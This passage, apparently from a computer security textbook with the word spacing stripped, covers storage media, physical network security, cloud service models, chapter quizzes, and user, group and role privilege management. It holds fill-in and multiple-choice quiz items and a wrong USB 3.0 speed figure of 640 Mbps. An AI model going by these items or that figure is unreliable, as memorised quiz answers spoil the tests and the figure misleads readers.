forinstance,thistechnologyprotectsthedataifthedriveitselfislostorstolen.ThismaynotbeimportantifathieftakesthewholePC,butinlargerstorageenvironments,drivesareplacedinseparateboxesandremotelyaccessed.Inthespecificcaseofnotebookmachines,thislayercanbetiedtosmartcardinterfacestoprovidemoresecurity.Asthisisbuiltintothecontroller,encryptionprotocolssuchasAdvancedEncryptionStandard(AES)andTripleDataEncryptionStandard(3DES)canbeperformedatfulldrivespeed.
DiskettesFloppydiskswerethecomputerindustry’sfirstattemptatportablemagneticmedia.Themovablemediumwasplacedinaprotectivesleeve,andthedriveremainedinthemachine.Capacitiesupto1.4MBwereachieved,butthefragilityofthedeviceasthesizeincreased,aswellascompetingmedia,hasrenderedfloppiesalmostobsolete.Diskettesarepartofhistorynow.
TapeMagnetictapehasheldaplaceincomputercenterssincethebeginningofcomputing.Itsprimaryusehasbeenbulkofflinestorageandbackup.Tapefunctionswellinthisrolebecauseofitslowcost.Thedisadvantageoftapeisitsnatureasaserialaccessmedium,makingitslowtoworkwithforlargequantitiesofdata.Severaltypesofmagnetictapeareinusetoday,rangingfromquarterinchtodigitallineartape(DLT)anddigitalaudiotape(DAT).Thesecartridgescanholdupwardof60GBofcompresseddata.Tapesarestillamajorconcernfromasecurityperspective,astheyare
usedtobackupmanytypesofcomputersystems.Thephysicalprotectionaffordedthetapesisofconcern,becauseifatapeisstolen,anunauthorizedusercouldestablishanetworkandrecoveryourdataonhissystem,becauseit’sallstoredonthetape.Offsitestorageisneededforproperdisasterrecoveryprotection,butsecureoffsitestorageandtransportiswhatisreallyneeded.Thisimportantissueisfrequentlyoverlookedin
manyfacilities.Thesimplesolutiontomaintaincontroloverthedataevenwhenyoucan’tcontrolthetapeisthroughencryption.Backuputilitiescansecurethebackupswithencryption,butthisoptionisfrequentlynotused,foravarietyofreasons.Regardlessoftherationalefornotencryptingdata,onceatapeislost,notusingtheencryptionoptionbecomesalamenteddecision.
•Amagnetictapecartridgeforbackups
OpticalMediaOpticalmediainvolvetheuseofalasertoreaddatastoredonaphysical
device.Insteadofhavingamagneticheadthatpicksupmagneticmarksonadisk,alaserpicksupdeformitiesembeddedinthemediathatcontaintheinformation.Aswithmagneticmedia,opticalmediacanberead-write,althoughtheread-onlyversionisstillmorecommon.
CD-R/DVDThecompactdisc(CD)tookthemusicindustrybystorm,andthenittookthecomputerindustrybystormaswell.AstandardCDholdsmorethan640MBofdata,insomecasesupto800MB.Thedigitalvideodisc(DVD)canholdalmost5GBofdatasinglesided,8.5GBduallayer.Thesedevicesoperateasopticalstorage,withlittlemarksburnedinthemtorepresent1’sand0’sonamicroscopicscale.ThemostcommontypeofCDistheread-onlyversion,inwhichthedataiswrittentothedisconceandonlyreadafterward.Thishasbecomeapopularmethodfordistributingcomputersoftware,althoughhigher-capacityDVDshavereplacedCDsforprogramdistribution.
•ADVD(left)andCD(right)
Asecond-generationdevice,therecordablecompactdisc(CD-R),allowsuserstocreatetheirownCDsusingaburnerdeviceintheirPCandspecialsoftware.Userscannowbackupdata,maketheirownaudioCDs,anduseCDsashigh-capacitystorage.Theirrelativelylowcosthasmadethemeconomicaltouse.CDshaveathinlayerofaluminuminsidetheplastic,uponwhichbumpsareburnedbythelaserwhenrecorded.CD-Rsuseareflectivelayer,suchasgold,uponwhichadyeisplacedthatchangesuponimpactbytherecordinglaser.Anewertype,CD-RW,hasadifferentdyethatallowsdiscstobeerasedandreused.ThecostofthemediaincreasesfromCD,toCD-R,toCD-RW.
Blu-rayDiscsThelatestversionofopticaldiscistheBlu-raydisc.Usingasmaller,violet-bluelaser,thissystemcanholdsignificantlymoreinformationthanaDVD.Blu-raydiscscanholdupto128GBinfourlayers.ThetransferspeedofBlu-rayat>48MbpsisoverfourtimesgreaterthanthatofDVDsystems.Designedforhigh-definition(HD)video,Blu-rayofferssignificantstoragefordataaswell.
TechTip
BackupLifetimesAcommonmisconceptionisthatdatabackedupontomagneticmediawilllastforlongperiodsoftime.Althoughoncetoutedaslastingdecades,modernmicro-encodingmethodsareprovinglessdurablethanexpected,sometimeswithlifetimeslessthantenyears.Asecondaryproblemismaintainingoperatingsystemaccessviadriverstolegacyequipment.Astechnologymovesforward,findingdriversforten-year-oldtapedrivesforWindows7orthelatestversionofLinuxwillprovetobeamajorhurdle.
DVDsnowoccupythesamerolethatCDshaveintherecentpast,exceptthattheyholdmorethanseventimesthedataofaCD.Thismakesfull-lengthmovierecordingpossibleonasingledisc.TheincreasedcapacitycomesfromfinertolerancesandthefactthatDVDscanholddata
onbothsides.AwiderangeofformatsforDVDsincludeDVD+R,DVD-R,duallayer,andnowHDformats,HD-DVDandBlu-ray.Thisvarietyisduetocompeting“standards”andcanresultinconfusion.DVD+Rand-Raredistinguishableonlywhenrecording,andmostdevicessince2004shouldreadboth.Duallayersaddadditionalspacebutrequireappropriatedual-layer–enableddrives.
ElectronicMediaThelatestformofremovablemediaiselectronicmemory.Electroniccircuitsofstaticmemory,whichcanretaindataevenwithoutpower,fillanichewherehighdensityandsmallsizeareneeded.Originallyusedinaudiodevicesanddigitalcameras,theseelectronicmediacomeinavarietyofvendor-specifictypes,suchassmartcards,SmartMedia,SDcards,flashcards,memorysticks,andCompactFlashdevices.Thesememorydevicesrangefromsmallcard-likedevices,ofwhichmicroSDcardsaresmallerthandimesandhold2GB,toUSBsticksthatholdupto64GB.Thesedevicesarebecomingubiquitous,withnewPCsandnetbookscontainingbuilt-inslotstoreadthemlikeanyotherstoragedevice.
•SD,microSD,andCompactFlashcards
Althoughtheyareusedprimarilyforphotosandmusic,thesedevicescouldbeusedtomoveanydigitalinformationfromonemachinetoanother.Toamachineequippedwithaconnectorport,thesedeviceslooklikeanyotherfilestoragelocation.TheycanbeconnectedtoasystemthroughaspecialreaderordirectlyviaaUSBport.InnewerPCsystems,aUSBbootdevicehasreplacedtheolderfloppydrive.Thesedevicesaresmall,canholdasignificantamountofdata—over128GBattimeofwriting—andareeasytomovefrommachinetomachine.Anothernovelinterfaceisamousethathasaslotforamemorystick.Thisdual-purposedeviceconservesspace,conservesUSBports,andiseasytouse.Thememorystickisplacedinthemouse,whichcanthenbeusednormally.Thestickiseasilyremovableandtransportable.Themouseworkswithorwithoutthememorystick;itisjustaconvenientdevicetouseforaportal.
Theadventoflarge-capacityUSBstickshasenableduserstobuildentiresystems,OSs,andtoolsontothemtoensuresecurityandveracityoftheOSandtools.Withtheexpandinguseofvirtualization,ausercouldcarryanentiresystemonaUSBstickandbootitusingvirtuallyanyhardware.WithUSB3.0andits640-Mbpsspeeds,thisisahighlyversatileformofmemorythatenablesmanynewcapabilities.
•128GBUSB3.0memorystick
Solid-StateHardDrivesWiththeriseofsolid-statememorytechnologiescomesasolid-state“harddrive.”Solid-statedrives(SSDs)aremovingintomobiledevices,desktops,andevenservers.Memorydensitiesaresignificantlybeyondphysicaldrives,therearenomovingpartstowearoutorfail,andSSDshavevastlysuperiorperformancespecifications.Figure10.10showsa512GBSSDfromalaptop,onahalf-heightminicardmSATAinterface.Theonlyfactorthathasslowedthespreadofthistechnologyhasbeencost,butrecentcostreductionshavemadethisformofmemoryafirst
choiceinmanysystems.
Figure10.10 512GBsolid-statehalf-heightminicard
SecurityConcernsforTransmissionMediaTheprimarysecurityconcernforasystemadministratorhastobe
preventingphysicalaccesstoaserverbyanunauthorizedindividual.Suchaccesswillalmostalwaysspelldisaster,forwithdirectaccessandthecorrecttools,anysystemcanbeinfiltrated.Oneoftheadministrator’snextmajorconcernsshouldbepreventingunfetteredaccesstoanetworkconnection.Accesstoswitchesandroutersisalmostasbadasdirectaccesstoaserver,andaccesstonetworkconnectionswouldrankthirdintermsofworst-casescenarios.Preventingsuchaccessiscostly,yetthecostofreplacingaserverbecauseoftheftisalsocostly.
PhysicalSecurityConcernsAbalancedapproachisthemostsensibleapproachwhenaddressingphysicalsecurity,andthisappliestotransmissionmediaaswell.Keepingnetworkswitchroomssecureandcablerunssecureseemsobvious,butcasesofusingjanitorialclosetsforthisvitalbusinesspurposeabound.Oneofthekeystomountingasuccessfulattackonanetworkisinformation.Usernames,passwords,serverlocations—allofthesecanbeobtainedifsomeonehastheabilitytoobservenetworktrafficinaprocesscalledsniffing.Asniffercanrecordallthenetworktraffic,andthisdatacanbeminedforaccounts,passwords,andtrafficcontent,allofwhichcanbeusefultoanunauthorizeduser.Onestartingpointformanyintrusionsistheinsertionofanunauthorizedsnifferintothenetwork,withthefruitsofitslaborsdrivingtheremainingunauthorizedactivities.Manycommonscenariosexistwhenunauthorizedentrytoanetworkoccurs,includingthese:
Insertinganodeandfunctionalitythatisnotauthorizedonthenetwork,suchasasnifferdeviceorunauthorizedwirelessaccesspoint
Modifyingfirewallsecuritypolicies
ModifyingACLsforfirewalls,switches,orrouters
Modifyingnetworkdevicestoechotraffictoanexternalnode
Networkdevicesandtransmissionmediabecometargetsbecausetheyaredispersedthroughoutanorganization,andphysicalsecurityofmanydisperseditemscanbedifficulttomanage.Althoughlimitingphysicalaccessisdifficult,itisessential.Theleastlevelofskillisstillmorethansufficienttoaccomplishunauthorizedentryintoanetworkifphysicalaccesstothenetworksignalsisallowed.Thisisonefactordrivingmanyorganizationstousefiber-optics,forthesecablesaremuchmoredifficulttotap.AlthoughmanytrickscanbeemployedwithswitchesandVLANstoincreasesecurity,itisstillessentialthatyoupreventunauthorizedcontactwiththenetworkequipment.
CrossCheckPhysicalInfrastructureSecurityThebestfirsteffortistosecuretheactualnetworkequipmenttopreventthistypeofintrusion.AsyoushouldrememberfromChapter8,physicalaccesstonetworkinfrastructureprovidesamyriadofissues,andmostofthemcanbecatastrophicwithrespecttosecurity.Physicallysecuringaccesstonetworkcomponentsisoneofthe“mustdos”ofacomprehensivesecurityeffort.
Wirelessnetworksmaketheintruder’staskeveneasier,astheytakethenetworktotheusers,authorizedornot.Atechniquecalledwar-drivinginvolvesusingalaptopandsoftwaretofindwirelessnetworksfromoutsidethepremises.Atypicaluseofwar-drivingistolocateawirelessnetworkwithpoor(orno)securityandobtainfreeInternetaccess,butotherusescanbemoredevastating.Asimplesolutionistoplaceafirewallbetweenthewirelessaccesspointandtherestofthenetworkandauthenticateusersbeforeallowingentry.BusinessusersuseVPNtechnologytosecuretheirconnectiontotheInternetandotherresources,andhomeuserscandothesamethingtopreventneighborsfrom“sharing”theirInternetconnections.Toensurethatunauthorizedtrafficdoesnotenteryournetworkthroughawirelessaccesspoint,youmusteitheruseafirewallwithanauthenticationsystemorestablishaVPN.
CloudComputingCloudcomputingisacommontermusedtodescribecomputerservicesprovidedoveranetwork.Thesecomputingservicesarecomputing,storage,applications,andservicesthatareofferedviatheInternetProtocol.Oneofthecharacteristicsofcloudcomputingistransparencytotheenduser.Thisimprovesusabilityofthisformofserviceprovisioning.Cloudcomputingoffersmuchtotheuser:improvementsinperformance,scalability,flexibility,security,andreliability,amongotheritems.Theseimprovementsareadirectresultofthespecificattributesassociatedwithhowcloudservicesareimplemented.Securityisaparticularchallengewhendataandcomputationare
handledbyaremoteparty,asincloudcomputing.Thespecificchallengeishowdoesoneallowdataoutsidetheirenterpriseandyetremainincontroloverhowthedataisused,andthecommonanswerisencryption.Byproperlyencryptingdatabeforeitleavestheenterprise,externalstoragecanstillbeperformedsecurely.Cloudscanbecreatedbymanyentities,internalandexternaltoan
organization.Commercialcloudservicesarealreadyavailableandofferedbyavarietyoffirms,aslargeasGoogleandAmazon,tosmaller,localproviders.Internalservicescanreplicatetheadvantagesofcloudcomputingwhileimprovingtheutilityoflimitedresources.Thepromiseofcloudcomputingisimprovedutilityand,assuch,ismarketedundertheconceptsofSoftwareasaService,PlatformasaService,andInfrastructureasaService.
PrivateIfyourorganizationishighlysensitivetosharingresources,youmaywishtoconsidertheuseofaprivatecloud.Privatecloudsareessentiallyreservedresourcesusedonlyforyourorganization—yourownlittlecloudwithinthecloud.Thisservicewillbeconsiderablymoreexpensive,butitshouldalsocarrylessexposureandshouldenableyourorganizationto
betterdefinethesecurity,processing,andhandlingofdatathatoccurswithinyourcloud.
PublicThetermpubliccloudreferstowhenthecloudserviceisrenderedoverasystemthatisopenforpublicuse.Inmostcases,thereislittleoperationaldifferencebetweenpublicandprivatecloudarchitectures,butthesecurityramificationscanbesubstantial.Althoughpubliccloudserviceswillseparateuserswithsecurityrestrictions,thedepthandleveloftheserestrictions,bydefinition,willbesignificantlylessinapubliccloud.
HybridAhybridcloudstructureisonewhereelementsarecombinedfromprivate,public,andcommunitycloudstructures.Whenexaminingahybridstructure,youneedtoremaincognizantthatoperationallythesedifferingenvironmentsmaynotactuallybejoined,butratherusedtogether.Sensitiveinformationcanbestoredintheprivatecloudandissue-relatedinformationcanbestoredinthecommunitycloud,allofwhichinformationisaccessedbyanapplication.Thismakestheoverallsystemahybridcloudsystem.
CommunityAcommunitycloudsystemisonewhereseveralorganizationswithacommoninterestshareacloudenvironmentforthespecificpurposesofthesharedendeavor.Forexample,localpublicentitiesandkeylocalfirmsmayshareacommunityclouddedicatedtoservingtheinterestsofcommunityinitiatives.Thiscanbeanattractivecost-sharingmechanismforspecificdata-sharinginitiatives.
ExamTip:BesureyouunderstandthedifferencesbetweencloudcomputingservicemodelsPlatformasaService,SoftwareasaService,andInfrastructureasaService.
SoftwareasaServiceSoftwareasaService(SaaS)istheofferingofsoftwaretoendusersfromwithinthecloud.Ratherthaninstallingsoftwareonclientmachines,SaaSactsassoftwareondemandwherethesoftwarerunsfromthecloud.Thishasseveraladvantages,asupdatesareoftenseamlesstoendusersandintegrationbetweencomponentsisenhanced.
PlatformasaServicePlatformasaService(PaaS)isamarketingtermusedtodescribetheofferingofacomputingplatforminthecloud.Multiplesetsofsoftware,workingtogethertoprovideservices,suchasdatabaseservices,canbedeliveredviathecloudasaplatform.
InfrastructureasaServiceInfrastructureasaService(IaaS)isatermusedtodescribecloud-basedsystemsthataredeliveredasavirtualplatformforcomputing.Ratherthanbuildingdatacenters,IaaSallowsfirmstocontractforutilitycomputingasneeded.
Chapter10Review
LabManualExerciseThefollowinglabexercisefromthecompanionlabmanual,PrinciplesofComputerSecurityLabManual,FourthEdition,providespracticalapplicationofmaterialcoveredinthischapter:
Lab7.3lConfiguringaPersonalFirewallinLinux
ChapterSummaryAfterreadingthischapterandcompletingtheexercises,youshouldunderstandthefollowingaspectsofnetworkingandsecureinfrastructures.
Constructnetworksusingdifferenttypesofnetworkdevices
Understandthedifferencesbetweenbasicnetworkdevices,suchashubs,bridges,switches,androuters.
Understandthesecurityimplicationsofnetworkdevicesandhowtoconstructasecurenetworkinfrastructure.
Enhancesecurityusingsecuritydevices
Understandtheuseoffirewalls,next-generationfirewalls,andintrusiondetectionsystems.
Understandtheroleofloadbalancersandproxyserversaspartofasecurenetworksolution.
Understandtheuseofsecurityappliances,suchaswebsecuritygateways,datalossprevention,andunifiedthreatmanagement.
EnhancesecurityusingNAC/NAPmethodologies
TheCiscoNACprotocolandtheMicrosoftNAPprotocolprovidesecurityfunctionalitywhenattachingdevicestoanetwork.
NACandNAPplayacrucialroleinthesecuringofinfrastructureasdevicesenterandleavethenetwork.
NACandNAPcanbeusedtogethertotakeadvantageofthestrengthsandinvestmentsineachtechnologytoformastrongnetworkadmissionmethodology.
Identifythedifferenttypesofmediausedtocarrynetworksignals
Guidedandunguidedmediacanbothcarrynetworktraffic.
Wiredtechnologyfromcoaxcable,throughtwisted-pairEthernet,providesacost-effectivemeansofcarryingnetworktraffic.
Fibertechnologyisusedtocarryhigherbandwidth.
Unguidedmedia,includinginfraredandRF(includingwirelessandBluetooth),provideshort-rangenetworkconnectivity.
Describethedifferenttypesofstoragemediausedtostoreinformation
Thereareawidearrayofremovablemediatypesfrommemorystickstoopticaldiscstoportabledrives.
Datastorageonremovablemedia,becauseofincreasedphysicalaccess,createssignificantsecurityimplications.
Usebasicterminologyassociatedwithnetworkfunctionsrelatedtoinformationsecurity
Understandingandusingthecorrectvocabularyfordevicenamesandrelationshipstonetworkingisimportantasasecurityprofessional.
Securityappliancesaddterminology,includingspecificitemsforIDSandfirewalls.
Describethedifferenttypesandusesofcloudcomputing
Understandthetypesofcloudsinuse.
UnderstandtheuseofSoftwareasaService,InfrastructureasaService,andPlatformasaService.
KeyTermsbasicpacketfiltering(261)bridge(257)cloudcomputing(283)coaxialcable(274)collisiondomain(257)concentrator(264)datalossprevention(DLP)(272)firewall(260)hub(257)InfrastructureasaService(IaaS)(284)Internetcontentfilter(272)loadbalancer(269)modem(265)networkaccesscontrol(267)NetworkAccessProtection(NAP)(267)NetworkAdmissionControl(NAC)(268)NetworkAttachedStorage(NAS)(255)networkinterfacecard(NIC)(256)networkoperationscenter(NOC)(268)next-generationfirewall(263)PlatformasaService(PaaS)(284)privatebranchexchange(PBX)(266)proxyserver(270)router(258)sandboxing(255)servers(253)
shieldedtwisted-pair(STP)(275)SoftwareasaService(SaaS)(284)solid-statedrive(SSD)(281)switch(257)unifiedthreatmanagement(UTM)(272)unshieldedtwisted-pair(UTP)(275)virtualization(254)websecuritygateway(271)wirelessaccesspoint(264)workstation(253)
KeyTermsQuizUsetermsfromtheKeyTermslisttocompletethesentencesthatfollow.Don’tusethesametermmorethanonce.Notalltermswillbeused.
1.A(n)_______________routespacketsbasedonIPaddresses.2.Tooffersoftwaretoendusersfromthecloudisaformof
_______________.
3.Toconnectacomputertoanetwork,youusea(n)_______________.
4.A(n)_______________or_______________distributestrafficbasedonMACaddresses.
5.Toverifythatacomputerisproperlyconfiguredtoconnecttoanetwork,thenetworkcanuse_______________.
6._______________isanameforthetypicalcomputerauserusesonanetwork.
7.A(n)_______________repeatsalldatatrafficacrossallconnectedports.
8.Cat5isanexampleof_______________cable.9.Basicpacketfilteringoccursatthe____________.
10.A(n)_______________isanextensionofthetelephoneserviceintoafirm’stelecommunicationsnetwork.
Multiple-ChoiceQuiz1.SwitchesoperateatwhichlayeroftheOSImodel?
A.Physicallayer
B.Networklayer
C.Datalinklayer
D.Applicationlayer
2.UTPcablesareterminatedforEthernetusingwhattypeofconnector?
A.ABNCplug
B.AnEthernetconnector
C.Astandardphonejackconnector
D.AnRJ-45connector
3.Coaxialcablecarrieshowmanyphysicalchannels?A.Two
B.Four
C.One
D.Noneoftheabove
4.Networkaccesscontrolisassociatedwithwhichofthefollowing?
A.NAP
B.IPsec
C.IPv6
D.NAT
5.Thepurposeoftwistingthewiresintwisted-paircircuitsisto:A.Increasespeed
B.Increasebandwidth
C.Reducecrosstalk
D.Alloweasiertracing
6.MicrosoftNAPpermits:A.Restrictionofconnectionstoarestrictedsubnetonly
B.CheckingofaclientOSpatchlevelbeforeanetworkconnectionispermitted
C.Denialofaconnectionbasedonclientpolicysettings
D.Alloftheabove
7.SNMPisaprotocolusedforwhichofthefollowingfunctions?A.Securee-mail
B.Secureencryptionofnetworkpackets
C.Remoteaccesstouserworkstations
D.Remoteaccesstonetworkinfrastructure
8.Firewallscanusewhichofthefollowingintheiroperation?A.Statefulpacketinspection
B.Portblockingtodenyspecificservices
C.NATtohideinternalIPaddresses
D.Alloftheabove
9.SMTPisaprotocolusedforwhichofthefollowingfunctions?A.E-mail
B.Secureencryptionofnetworkpackets
C.Remoteaccesstouserworkstations
D.Noneoftheabove
10.USB-basedflashmemoryischaracterizedby:A.Highcost
B.Lowcapacity
C.Slowaccess
D.Noneoftheabove
EssayQuiz1.Compareandcontrastroutersandswitchesbydescribingwhatthe
advantagesanddisadvantagesareofeach.
2.Describethecommonthreatstothetransmissionmediainanetwork,bytypeoftransmissionmedia.
LabProjects
•LabProject10.1UsingtwoPCsandasmallhomeoffice–typerouter,configurethemtocommunicateacrossthenetworkwitheachother.
•LabProject10.2DemonstratenetworkconnectivityusingWindowscommand-linetools.
chapter11 AuthenticationandRemoteAccess
WeshouldsetanationalgoalofmakingcomputersandInternetaccessavailableforeveryAmerican.
O
—WILLIAMJEFFERSONCLINTON
Inthischapter,youwilllearnhowto
Identifythedifferencesamonguser,group,androlemanagement
Implementpasswordanddomainpasswordpolicies
Describemethodsofaccountmanagement(SSO,timeofday,logicaltoken,accountexpiration)
Describemethodsofaccessmanagement(MAC,DAC,andRBAC)
Discussthemethodsandprotocolsforremoteaccesstonetworks
Identifyauthentication,authorization,andaccounting(AAA)protocols
Explainauthenticationmethodsandthesecurityimplicationsintheiruse
Implementvirtualprivatenetworks(VPNs)andtheirsecurityaspects
DescribeInternetProtocolSecurity(IPsec)anditsuseinsecuringcommunications
nsingle-usersystemssuchasPCs,theindividualusertypicallyhasaccesstomostofthesystem’sresources,processingcapability,andstoreddata.Onmultiusersystems,suchasserversandmainframes,an
individualusertypicallyhasverylimitedaccesstothesystemandthedatastoredonthatsystem.Anadministratorresponsibleformanagingandmaintainingthemultiusersystemhasmuchgreateraccess.Sohowdoesthecomputersystemknowwhichusersshouldhaveaccesstowhatdata?Howdoestheoperatingsystemknowwhatapplicationsauserisallowedtouse?Onearlycomputersystems,anyonewithphysicalaccesshadfairly
significantrightstothesystemandcouldtypicallyaccessanyfileorexecuteanyapplication.Ascomputersbecamemorepopularanditbecameobviousthatsomewayofseparatingandrestrictinguserswasneeded,theconceptsofusers,groups,andprivilegescameintobeing(privilegesmeanyouhavetheabilityto“dosomething”onacomputersystemsuchascreateadirectory,deleteafile,orrunaprogram).Theseconceptscontinuetobedevelopedandrefinedandarenowpartofwhat
wecallprivilegemanagement.Privilegemanagementistheprocessofrestrictingauser’sabilityto
interactwiththecomputersystem.Essentially,everythingausercandotoorwithacomputersystemfallsintotherealmofprivilegemanagement.Privilegemanagementoccursatmanydifferentpointswithinanoperatingsystemorevenwithinapplicationsrunningonaparticularoperatingsystem.Remoteaccessisanotherkeyissueformultiusersystemsintoday’s
worldofconnectedcomputers.Isolatedcomputers,notconnectedtonetworksortheInternet,arerareitemsthesedays.Exceptforsomespecial-purposemachines,mostcomputersneedinterconnectivitytofulfilltheirpurpose.Remoteaccessenablesusersoutsideanetworktohavenetworkaccessandprivilegesasiftheywereinsidethenetwork.Beingoutsideanetworkmeansthattheuserisworkingonamachinethatisnotphysicallyconnectedtothenetworkandmustthereforeestablishaconnectionthrougharemotemeans,suchasbydialingin,connectingviatheInternet,orconnectingthroughawirelessconnection.Authenticationistheprocessofestablishingauser’sidentitytoenable
thegrantingofpermissions.Toestablishnetworkconnections,avarietyofmethodsareused,thechoiceofwhichdependsonnetworktype,thehardwareandsoftwareemployed,andanysecurityrequirements.
User,Group,andRoleManagementTomanagetheprivilegesofmanydifferentpeopleeffectivelyonthesamesystem,amechanismforseparatingpeopleintodistinctentities(users)isrequired,soyoucancontrolaccessonanindividuallevel.Atthesametime,it’sconvenientandefficienttobeabletolumpuserstogetherwhengrantingmanydifferentpeople(groups)accesstoaresourceatthesametime.Atothertimes,it’susefultobeabletograntorrestrictaccessbasedonaperson’sjoborfunctionwithintheorganization(role).Whileyoucanmanageprivilegesonthebasisofusersalone,managinguser,group,androleassignmentstogetherisfarmoreconvenientandefficient.
TechTip
UserIDvs.UsernameTheterms“userID”and“username”aresometimesusedinterchangeably,buttraditionallythetermuserIDismoreoftenassociatedwithUNIXoperatingsystems.InUNIXoperatingsystems,eachuserisidentifiedbyanunsignedintegercalledauseridentifier,oftenshortenedtouserID.
UserThetermusergenerallyappliestoanypersonaccessingacomputersystem.Inprivilegemanagement,auserisasingleindividual,suchas“JohnForthright”or“SallyJenkins.”Thisisgenerallythelowestleveladdressedbyprivilegemanagementandthemostcommonareaforaddressingaccess,rights,andcapabilities.Whenaccessingacomputersystem,eachuserisgenerallygivenausername—auniquealphanumericidentifierheorshewillusetoidentifyhimselforherselfwhenloggingintooraccessingthesystem.Whendevelopingaschemeforselectingusernames,youshouldkeepinmindthatusernamesmustbeuniquetoeachuser,buttheymustalsobefairlyeasyfortheusertorememberanduse.
ExamTip:Ausernameisauniquealphanumericidentifierusedtoidentifyausertoacomputersystem.Permissionscontrolwhatauserisallowedtodowithobjectsonacomputersystem—whatfilestheycanopen,whatprinterstheycanuse,andsoon.InWindowssecuritymodels,permissionsdefinetheactionsausercanperformonanobject(openafile,deleteafolder,andsoon).Rightsdefinetheactionsausercanperformonthesystemitself,suchaschangethetime,adjustauditinglevels,andsoon.Rightsaretypicallyappliedtooperatingsystem–leveltasks.
Withsomenotableexceptions,ingeneralauserwhowantstoaccessacomputersystemmustfirsthaveausernamecreatedforhimonthesystem
hewishestouse.Thisisusuallydonebyasystemadministrator,securityadministrator,orotherprivilegeduser,andthisisthefirststepinprivilegemanagement—ausershouldnotbeallowedtocreatetheirownaccount.Oncetheaccountiscreatedandausernameisselected,the
administratorcanassignspecificpermissionstothatuser.Permissionscontrolwhattheuserisallowedtodowithobjectsonthesystem—whichfileshemayaccess,whichprogramshemayexecute,andsoon.WhilePCstypicallyhaveonlyoneortwouseraccounts,largersystemssuchasserversandmainframescanhavehundredsofaccountsonthesamesystem.Figure11.1showstheUsersmanagementtaboftheComputerManagementutilityonaWindowsServer2008system.Notethatseveraluseraccountshavebeencreatedonthissystem,eachidentifiedbyauniqueusername.
•Figure11.1UserstabonaWindowsServer2008system
Afew“special”useraccountsdon’ttypicallymatchupone-to-onewitharealperson.Theseaccountsarereservedforspecialfunctionsandtypicallyhavemuchmoreaccessandcontroloverthecomputersystemthantheaverageuseraccount.TwosuchaccountsaretheadministratoraccountunderWindowsandtherootaccountunderUNIX.Eachoftheseaccountsisalsoknownasthesuperuser—ifsomethingcanbedoneonthesystem,thesuperuserhasthepowertodoit.Theseaccountsarenottypicallyassignedtoaspecificindividualandarerestricted,accessedonlywhenthefullcapabilitiesofthataccountarerequired.
Auditinguseraccounts,groupmembership,andpasswordstrengthonaregularbasisisanextremelyimportantsecuritycontrol.Manycomplianceauditsfocusonthepresenceorlackofindustry-acceptedsecuritycontrols.
Duetothepowerpossessedbytheseaccounts,andthefew,ifany,restrictionsplacedonthem,theymustbeprotectedwithstrongpasswordsthatarenoteasilyguessedorobtained.Theseaccountsarealsothemostcommontargetsofattackers—iftheattackercangainrootaccessorassumetheprivilegelevelassociatedwiththerootaccount,shecanbypassmostaccesscontrolsandaccomplishanythingshewantsonthatsystem.
TechTip
GenericAccountsGenericaccountsareaccountswithoutanameduserbehindthem.Thesecanbeemployedforspecialpurposes,suchasrunningservicesandbatchprocesses,butbecausetheycannotbeattributedtoanindividual,theyshouldnothaveloginability.Itisalsoimportantthatiftheyhaveelevatedprivileges,theiractivitiesbecontinuallymonitoredastowhatfunctionstheyareperformingversuswhattheyareexpectedtobedoing.Generaluseofgenericaccountsshouldbeavoidedbecauseoftheincreasedriskassociatedwithnoattributioncapability.
Anotheraccountthatfallsintothe“special”categoryisthesystemaccountusedbyWindowsoperatingsystems.ThesystemaccounthasthesamefileprivilegesastheadministratoraccountandisusedbytheoperatingsystemandbyservicesthatrununderWindows.Bydefault,thesystemaccountisgrantedfullcontroltoallfilesonanNTFSvolume.ServicesandprocessesthatneedthecapabilitytologoninternallywithinWindowswillusethesystemaccount—forexample,theDNSServerandDHCPServerservicesinWindowsServer2008usetheLocalSystemaccount.
GroupUnderprivilegemanagement,agroupisacollectionofuserswithsomecommoncriteria,suchasaneedforaccesstoaparticulardatasetorgroupofapplications.Agroupcanconsistofoneuserorhundredsofusers,andeachusercanbelongtooneormoregroups.Figure11.2showsacommonapproachtogroupingusers—buildinggroupsbasedonjobfunction.
•Figure11.2Logicalrepresentationofgroups
Byassigningmembershipinaspecificgrouptoauser,youmakeitmucheasiertocontrolthatuser’saccessandprivileges.Forexample,if
everymemberoftheengineeringdepartmentneedsaccesstoproductdevelopmentdocuments,administratorscanplacealltheusersintheengineeringdepartmentinasinglegroupandallowthatgrouptoaccessthenecessarydocuments.Onceagroupisassignedpermissionstoaccessaparticularresource,addinganewusertothatgroupwillautomaticallyallowthatusertoaccessthatresource.Ineffect,theuser“inherits”thepermissionsofthegroupassoonassheisplacedinthatgroup.AsFigure11.3shows,acomputersystemcanhavemanydifferentgroups,eachwithitsownrightsandpermissions.
•Figure11.3GroupstabonaWindowsServer2008system
AsyoucanseefromthedescriptionfortheAdministratorsgroupinFigure11.3,thisgrouphascompleteandunrestrictedaccesstothesystem.
Thisincludesaccesstoallfiles,applications,anddatasets.AnyonewhobelongstotheAdministratorsgrouporisplacedinthisgroupwillhaveagreatdealofaccessandcontroloverthesystem.Someoperatingsystems,suchasWindows,havebuilt-ingroups—
groupsthatarealreadydefinedwithintheoperatingsystem,suchasAdministrators,PowerUsers,andEveryone.Thewholeconceptofgroupsrevolvesaroundmakingthetasksofassigningandmanagingpermissionseasier,andbuilt-ingroupscertainlyhelptomakethesetaskseasier.Individualusersaccountscanbeaddedtobuilt-ingroups,allowingadministratorstograntpermissionsetstousersquicklyandeasilywithouthavingtospecifypermissionsmanually.Forexample,addingauseraccountnamed“bjones”tothePowerUsersgroupgivesbjonesallthepermissionsassignedtothebuilt-inPowerUsersgroup,suchasinstallingdrivers,modifyingsettings,andinstallingsoftware.
RoleAnothercommonmethodofmanagingaccessandprivilegesisbyroles.Aroleisusuallysynonymouswithajoborsetoffunctions.Forexample,theroleofsecurityadmininMicrosoftSQLServermaybeappliedtosomeonewhoisresponsibleforcreatingandmanaginglogins,readingerrorlogs,andauditingtheapplication.Securityadminsneedtoaccomplishspecificfunctionsandneedaccesstocertainresourcesthatotherusersdonot—forexample,theyneedtobeabletocreateanddeletelogins,openandreaderrorlogs,andsoon.Ingeneral,anyoneservingintheroleofsecurityadminneedsthesamerightsandprivilegesaseveryothersecurityadmin.Forsimplicityandefficiency,rightsandprivilegescanbeassignedtotherolesecurityadmin,andanyoneassignedtofulfillthatroleautomaticallyhasthecorrectrightsandprivilegestoperformtherequiredtasks.
PasswordPolicies
